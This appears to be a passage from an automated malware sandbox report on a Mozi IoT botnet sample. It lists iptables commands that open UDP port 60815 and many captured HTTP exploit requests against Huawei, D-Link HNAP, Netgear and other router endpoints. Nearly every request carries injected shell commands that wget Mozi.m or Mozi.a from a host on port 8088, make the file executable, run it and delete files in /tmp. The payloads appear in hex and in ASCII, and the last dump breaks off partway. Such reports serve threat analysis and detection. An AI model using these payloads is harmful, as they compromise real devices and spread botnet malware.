                            Source: /bin/sh (PID: 6404)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6407)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6414)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6420)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6426)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6432)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6438)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPTJump to behavior
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 178.25.78.182:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 106.152.251.50:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 137.40.92.251:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 175.88.224.26:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 131.62.122.210:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 70.172.81.219:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 16.1.9.146:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 132.191.123.35:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 217.150.215.116:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 